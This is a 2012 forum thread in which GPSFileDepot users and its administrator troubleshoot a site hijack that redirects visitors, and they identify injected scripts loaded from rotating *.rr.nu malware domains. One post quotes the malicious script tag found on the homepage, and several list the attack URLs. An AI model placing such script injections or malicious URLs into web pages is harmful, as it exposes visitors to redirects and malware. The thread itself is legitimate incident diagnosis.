Welcome, Guest. Please login or register.

Login with username, password and session length
Forums Search:  


Author Topic: Domain forwarding issue  (Read 40065 times)

Seldom

  • Expert Advisor
  • *****
  • Posts: 1852
  • Karma: 19
    • View Profile
Re: Domain forwarding issue
« Reply #15 on: March 02, 2012, 09:12:35 AM »
Bottom line, the problem is on this website, not your machine - unless when the script runs  it infects your machine with a virus...that could be possible.

Not sure this explains why the problem went away when I deleted my browsing history.  Is it possible that browsing history can be infected?
« Last Edit: March 02, 2012, 09:15:50 AM by Seldom »

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
    • View Profile
Re: Domain forwarding issue
« Reply #16 on: March 02, 2012, 09:36:03 AM »
I just deleted my browsing history and temp files.  I then tried the site again with IE9and I got redirected.

Is there any danger in downloading the maps?

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
    • View Profile
Re: Domain forwarding issue
« Reply #17 on: March 02, 2012, 09:57:20 AM »
Something is definitely wrong here. Normally I use Firefox 7.01 on Windows. Am not getting the redirect there now. I tried IE 7 just now (which I never really use) and the site is ok there too.

So I tried Safari 5.1.3 on MacOS X, and my usual link to the forum - http://forums.gpsfiledepot.com/ just redirected me to the Russian site. Now it is working normally again.

If I look at the "activity" window in Safari, there is an entry for

http://rmore79riveru.rr.nu/nl.php?p=d

Googling this, I see that this may be malware infecting the forum software: http://pastebin.com/wKkNk7n6

I'm going to use the "report to moderator" button to make sure that Oz and Indrid are aware of this.

Seldom

  • Expert Advisor
  • *****
  • Posts: 1852
  • Karma: 19
    • View Profile
Re: Domain forwarding issue
« Reply #18 on: March 02, 2012, 10:04:12 AM »
Would Anti-Virus/Firewall matter? 
I'm using BitDefender.
Also, jbensman, when I deleted my browsing history I had "Preserve Favorites Website Data" unchecked.

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
    • View Profile
Re: Domain forwarding issue
« Reply #19 on: March 02, 2012, 10:16:19 AM »
Safari has an "activity" window that shows everything happening when you open a page. On almost every page I access, there are php scripts being executed on some foreign site. Right now I see one for http://astre09atyqr.rr.nu/nl.php?p=d

If I go to the forum homepage there's a link to http://asin54grepl.rr.nu/nl.php?p=d

If I do it again then it's http://ionbr82eastna.rr.nu/nl.php?p=d

There seem to be a large number of permutations of similar links. I don't see these listed in Firefox on Windows, so maybe they are being blocked. But something must be infected somewhere on the site...

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
    • View Profile
Re: Domain forwarding issue
« Reply #20 on: March 02, 2012, 10:23:10 AM »
Googling around some more., I found these:

http://webmasters.stackexchange.com/questions/26475/is-someone-hijacking-my-site

http://www.google.vu/support/forum/p/Webmasters/thread?tid=0c8c5f8c216cc9bd&hl=en

Quote
This line of code at the end of the homepage.

< sc ript src="http://ionis90landsi.rr.nu/nl.php?p=d"> < / sc ript >

From what I have seen this hack always includes a backdoor on the site.

-Oz-

  • Map Maker!
  • Administrator
  • Expert Advisor
  • *****
  • Posts: 1579
  • Karma: 27
    • View Profile
    • GPSFileDepot
Re: Domain forwarding issue
« Reply #21 on: March 02, 2012, 11:39:32 AM »
I have reuploaded original files from my computer however I am not sure how the exploit occurred since the pages are custom code (not wordpress or anything).

Passwords have been changed in case that was the exploit.

The site was definitely hijacked on the night of the 28th (not sure how I missed this thread).  I never noticed because I use Chrome.

However the backdoor still seems to be there which means the exploit is loaded in real time at the host.
« Last Edit: March 02, 2012, 11:44:55 AM by -Oz- »
Dan Blomberg
Administrator - GPSFileDepot
GPS Units: Garmin Dakota 20, Garmin GPSMap 60csx, Nuvi 255W, Nuvi 250W, ForeRunner 110, Fenix 2, Tactix Bravo, Foretrex 401
See/Download My Maps!

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
    • View Profile
Re: Domain forwarding issue
« Reply #22 on: March 02, 2012, 12:16:20 PM »
I am still getting the redirect in Internet Explorer.  I tried deleting history, temp files, and files. 

Indrid Cold

  • Moderator
  • Expert Advisor
  • *****
  • Posts: 919
  • Karma: 20
    • View Profile
Re: Domain forwarding issue
« Reply #23 on: March 02, 2012, 12:38:17 PM »
wish I could help here but I'm not getting anything out of the usual.

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
    • View Profile
Re: Domain forwarding issue
« Reply #24 on: March 02, 2012, 02:10:33 PM »
Eaparks emailed me this:


The hack/being redirected is back again, at least for me.  I'm not able to access GPSFileDepot, I'm being redirected to a site address called "rmore79riveru.rr.nu" (194.28.114.103.80).
 
I can just briefly see that there have been several post in the Download thread on GPSFileDeopt on the home page but I am redirected and blocked by Norton so I unable to see what everyone is saying about this.  If you are able to get on GPSFileDepot your welcome to say I'm unable to access the website if it will help in the discussion going on.  If there is a solution being discussed please advise me since I'm unable to participate in the discussion.
 
Thanks
Ed

Indrid Cold

  • Moderator
  • Expert Advisor
  • *****
  • Posts: 919
  • Karma: 20
    • View Profile

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
    • View Profile
Re: Domain forwarding issue
« Reply #26 on: March 02, 2012, 02:26:44 PM »
wish I could help here but I'm not getting anything out of the usual.

You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.


Indrid Cold

  • Moderator
  • Expert Advisor
  • *****
  • Posts: 919
  • Karma: 20
    • View Profile
Re: Domain forwarding issue
« Reply #27 on: March 02, 2012, 02:41:08 PM »
You have a Mac, right?
I might have a dozen or so Macs as well as them others...

Will give it a look when I get a chance, Safari seems to be working OK on the iPhone. NO cheesecake for me:(

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
    • View Profile
Re: Domain forwarding issue
« Reply #28 on: March 03, 2012, 05:48:21 AM »
FYI... when I started up my computer this morning I once again was redirected to http://myustreamtv.rr.nu/2f/

And using safari, I still see activity from url's such as http://sbulle06tsconti.rr.nu/nl.php?p=d

The redirect only happened the first time, but those URL's are embedded in the activity on every page.

dbperry

  • Mapper
  • ***
  • Posts: 57
  • Karma: 3
    • View Profile
Re: Domain forwarding issue
« Reply #29 on: March 03, 2012, 06:20:42 AM »
However the backdoor still seems to be there which means the exploit is loaded in real time at the host.

Yes, it appears that the link to the *.rr.nu script is loaded dynamically. That is why the subdomain (part of the web address before .rr.nu) is always different. I also wonder if that is why the redirect only happens sometimes - I wonder if sometimes, the dynamically loaded script is actually broken, so it doesn't redirect. That could explain the random / intermittent nature of the redirect that some people experience.

Oz, have you engaged / contacted your webhost? This is clearly at least somewhat their problem, not necessarily yours. What say they?

P.S. For me, Google Chrome (on Windows 7) appears to work OK, even with my anti-virus turned off. You may want to try that to access the site without problems. Deleting history, temp files, etc. probably won't fix the problem for you if you are having the redirect problem (since the problem really isn't on your computer), but either using a different browser or updating your anti-virus (so that it can block the script from running) might help.

Another work around that worked for me is to put "gpsfiledepot.com" in your 'restricted sites' list in Internet Explorer. Then IE will block the script from running and IE will access the site without the redirect. You might not be able to download or upload files with gpsfiledepot in your restricted sites list, but at least you would be able to get to this forum to find out when the problem gets fixed.

Dave